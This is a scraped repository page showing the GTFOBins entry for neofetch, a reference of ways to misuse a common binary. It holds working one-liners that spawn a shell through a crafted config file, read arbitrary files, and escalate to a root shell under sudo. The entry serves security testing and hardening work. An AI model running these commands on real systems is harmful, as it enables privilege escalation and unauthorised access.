This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-11-17 00:55:05 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
64763cdee6c14bf9e60855be4f83e36d107ea99f
GTFOBins.github.io
/
_gtfobins
/
neofetch.md
ymka-shelter
720cc73c7e
Add neofetch shell
...
Co-authored-by: Andrea Cardaci <
cyrus.and@gmail.com
>
2022-05-09 14:41:13 +02:00
496 B
Raw
Blame
History
functions
functions
shell
file-read
sudo
code
TF=$(mktemp) echo 'exec /bin/sh' >$TF neofetch --config $TF
description
code
The file content is used as the logo while some other information is displayed on its right, thus it might not be suitable to read arbitray binary files.
LFILE=file_to_read neofetch --ascii $LFILE
code
TF=$(mktemp) echo 'exec /bin/sh' >$TF sudo neofetch --config $TF
Reference in New Issue
View Git Blame
Copy Permalink